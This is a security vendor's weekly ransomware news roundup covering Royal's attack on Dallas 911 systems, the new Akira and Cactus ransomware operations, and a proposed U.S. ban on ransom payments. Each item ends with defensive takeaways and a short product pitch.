Ransomware Roundup: 05.15.23

Royal Ransomware Attack Continues to Cripple City of Dallas

Last week, the Royal ransomware gang claimed the City of Dallas as a victim, disrupting critical services including 911 dispatch systems.  

Emergency dispatch was still down in the Dallas 911 call center as of this weekend, with Police and firefighters responding to calls by radio with no details about the incident and forced to use paper and pencil to record addresses.

“Our priority remains the restoration of public safety functions such as Computer Aided Dispatch (CAD) for 911 and 311, as well as public-facing services including websites and payment and permitting systems,” a statement by officials read.

“Each device, webpage, and system will be brought back as soon as safely possible to prevent risking any further setback.”

Some stakeholders criticized Dallas officials for not communicating adequately during the crisis.

“It’s also a serious data breach incident. We have not heard a whisper from the chief of police, the mayor, or the city manager. This should be unacceptable, but here we are,” the Dallas Police Women’s Association tweeted.

“The citizens of Dallas deserve better. The employees of Dallas deserve better. The first responders of Dallas, who put their lives on the line, absolutely deserve better. This should have never even happened. But for God’s sake- say SOMETHING.”

Takeaway: Royal is a really ruthless threat actor group, and this level of disruption of emergency services and other critical operations is exactly what they are after - the more pain for the victims and the bigger the crisis they can cause just works in their favor.

Critical infrastructure, services and systems have never been under more of a threat than they are today in the face of a relentless barrage of ransomware attacks. Royal specializes in targeting critical infrastructure sectors.

While many organizations have stepped up efforts to prepare for a ransomware attack by implementing controls like anti-ransomware and endpoint protection solutions, most organizations have not done the hard work of actually preparing for a ransomware attack to be successful.

In addition to prevention capabilities, organizations need to hold regular tabletop exercises where they can stress test their incident response plans and develop contingencies to account for disruptions to systems and critical services.

Key to these exercises, and fundamental to any response actions, is good communication between all stakeholders, including staff and the general public.  

A disruptive ransomware attack creates enough issues, and a timely response is of the utmost importance. Lack of visibility and clear guidelines leave those impacted in a state of confusion and anxiety.  

Clear, concise communications during a crisis like the one the City of Dallas is experiencing will enhance response efforts and reduce the anxiety these headline-making attacks generate. Everyone should know what they need to be doing, and where they can get answers.

Organizations need to plan for failure, and assume the worst in preparing for any crisis, cyberattacks included. Resilience planning for when controls fail to protect the organization is just as important as prevention planning.

‍

Akira Ransomware Emerges with a Ransom Negotiation Chat Channel

The MalwareHunterTeam produced analysis of a newly emerged ransomware gang and variant called Akira. The group claims to have already attacked more than a dozen organizations across multiple industry verticals including education, finance, and manufacturing.

This group is not believed to be associated with another ransomware operator also called Akira that was active back in 2017, according to the researchers.

Akira modules will delete Windows Shadow Volume Copies leveraging PowerShell and is designed to encrypt a wide range of file types while avoiding Windows system files with .exe, .lnk, .dll, .msi, and .sys extensions.

Akira attacks thus far include data exfiltration with the threat to expose or sell the data should the victim fail to come to terms with the attackers. Akira has already reportedly leaked hundreds of gigabytes of stolen data from at least four victims.

"As for your data, if we fail to agree, we will try to sell personal information/trade secrets/databases/source codes - generally speaking, everything that has a value on the darkmarket - to multiple threat actors at ones. Then all of this will be published in our blog," the ransom note explains, per BleepingComputer.

The Akira extortion platform also includes a chat feature for victims to negotiate directly with the attackers.

“Each victim has a unique negotiation password that is entered into the threat actor's Tor site. Unlike many other ransomware operations, this negotiation site just includes a chat system that the victim can use to negotiate with the ransomware gang,” BleepingComputer reported.

Takeaway: Akira is just one of many ransomware operators to emerge recently, joining the likes of Rorschach, Cylance, Trigona, MoneyMessage, Nokoyawa and more. We’ve also seen a number of established ransomware gangs fall off the map recently, including Hive, Conti, Pysa, DoppelPaymer and REvil, to name just a few.

Some groups dissipated because a decrypter was released for their ransomware, members were arrested or operations disrupted by law enforcement, or the members simply chose to abandon a brand and reorganize under a different moniker with updated payloads and tooling.

While there is constant change in the ransomware economy, what has not changed is the fact that these criminal organizations continue to be profitable. Also, the increase in data exfiltration associated with ransomware attacks is presenting a whole other problem for victim organizations.

So, when does a ransomware attack become a ransomware attack? At initial ingress? When command & control is established? When data is exfiltrated? Or is it only a ransomware attack once the ransomware payload has been delivered?

Preventing, detecting and responding to the widespread and disruptive system and data encryption creates shorter-term issues that need to be addressed, and if the organization can survive if they were prepared to be resilient.

The longer-term issue is that, even if they are prepared to respond and recover from a ransomware attack, the fact that sensitive data was exfiltrated means the organization is exposed to brand damage, loss of intellectual property and their competitive advantage in the market and are open to legal liability issues should the data be regulated.

Organizations need to think far left of “boom” when preparing to respond to a ransomware attack, because today’s more complex, multi-stage attacks are focused on data exfiltration as well as the delivery of the ransomware payload at the end of the attack sequence.

A ransomware attack begins when the threat actors identify a potential victim and begin reconnaissance. If organizations are defending adequately, the attack can be stopped at any of the preceding stages before we ever see the ransomware payload introduced, and we’d never even know it was potentially a ransomware attack.

‍

Novel Cactus Ransomware Abuses VPNs for Persistence

A new ransomware operation has been observed targeting enterprise networks over the last two months delivering a ransomware payload dubbed Cactus by exploiting common vulnerabilities found in VPNs to gain persistence on the network.

“In all the cases investigated by Kroll, the attackers gain their initial foothold on a VPN appliance using a service account and they then deployed a SSH backdoor that connected back to their command-and-control (C2) server and was executed via a scheduled task,” CSO Online reports.

“This activity was immediately followed by network reconnaissance using a commercial Windows network scanner made by an Australian company called SoftPerfect. Additional PowerShell commands and scripts were used to enumerate computers on the network and extract user accounts from the Windows Security event log."

Takeaway: Abusing Virtual Private Networks (VPN) and Remote Desktop Protocol (RDP) are two of the most common tactics used by ransomware operators to gain persistence and move laterally and in a compromised network.  

RDP exploits are also used to remotely execute malicious code like malware and attack kits, or by executing scripts in fileless attacks, or when abusing legitimate network tools in what is known as living-off-the-land. Access to RDP and VPN instances is usually accomplished by way of stolen or brute-forced user credentials.

As well, exploitation of unpatched vulnerabilities is on the rise with ransomware gangs. Patching systems can be a complex process for some organizations. In order to avoid breaking critical business systems, patches often need to be applied in dev environments and tested prior to being put into production.  

Even then, some issues prevent patching due to legacy systems/software or internal (home-brewed) scripts/applications that will break if the patch is applied haphazardly. Thus, there can be months or more of work to do before some vulnerabilities can be mitigated, leaving the organization exposed.

The marked increase in the exploitation of vulnerabilities by ransomware gangs is further evidence that criminal actors continue to employ increasingly complex techniques that we used to only see in state-supported operations.  

Ransomware attacks used to be clumsier and more random, basically a numbers game where massive email spam campaigns or drive-by watering hole attacks designed to infect as many individual devices as possible while asking for ransoms of a fraction of a bitcoin - but those days have largely passed.

But the fact that these attackers are leveraging exploits for well-documented vulnerabilities means we have the opportunity to detect and stop these ransomware operations earlier in the attack sequence. Many of the TTPs they employ are common and should help to reveal the weeks or more of detectable activity on the network that occurs before the actual ransomware payload is delivered.

The ransomware payload is the very tail-end of a longer attack, so a multi-layer defense strategy that is designed to detect more than just the detonation of a ransomware binary is critical to detecting earlier and remediating against these attacks faster.

‍

White House Weighs Ban on Payments to Ransomware Operators

The White House is considering implementing a ban on payments to ransomware operators in an effort to reduce the financial incentives that drive disruptive and costly ransomware attacks.  

“Anne Neuberger, deputy national security advisor for cyber and emerging technologies, said Friday during a presentation at the Institute for Security and Technology’s Ransomware Task Force event,” Cybersecurity Dive reports.

“Specific conditions would warrant a waiver to the ban, especially in cases where a ransomware group is preventing the delivery of critical services, pending proper notification and permission from the pertinent government agency, Neuberger said.”

Takeaway: To pay or not to pay a ransom demand has been at the core of the issue since these threat actors began these more complex, targeted attacks against specific industries and organizations.

The simple answer is yes, ban payment of ransomware demands across the board. Ransomware attacks are (mostly) driven by financial incentives, so reducing or eliminating the financial payoffs for the attacks would certainly stifle this illicit industry.

But the answer is not that simple. In some cases, such as when a hospital is attacked, or other systems that control critical infrastructure where lives could be at risk, then expediency is of the utmost concern - ostensibly, but not always. Paying a ransom and receiving a decryption key from the attackers is likely more efficient, save for the fact that most organizations don't get all their data back even with the help of the attackers - so that's not a foolproof plan.

In some instances, offering a waiver to the ban also seems problematic, because if lives are potentially on the line, determining if the incident qualifies for the waiver would also likely add delay. There is also the data extortion issue. Even if an organization decides not to pay a ransom to restore systems, they may still be subject to extortion because the attackers already have stolen valuable and/or private data they use as leverage for leverage as payment.

Ultimately, we need to get to a place where we are not focused on addressing a ransomware attack after sensitive data has been exfiltrated and the disruptive ransomware payload has been delivered. This means a focus on detecting these multi-stage operations earlier in the attack sequence, as well as on resilience should the attack be successful, with an emphasis on preventing data loss and extended system downtime.

‍

Halcyon.ai is the industry’s first dedicated, adaptive security platform that combines multiple advanced proprietary prevention engines along with AI models focused specifically on stopping ransomware – talk to a Halcyon expert today to find out more. And check out the Recent Ransomware Attacks resource site to get near real-time tracking of ransomware attacks, threat actor groups and their victims.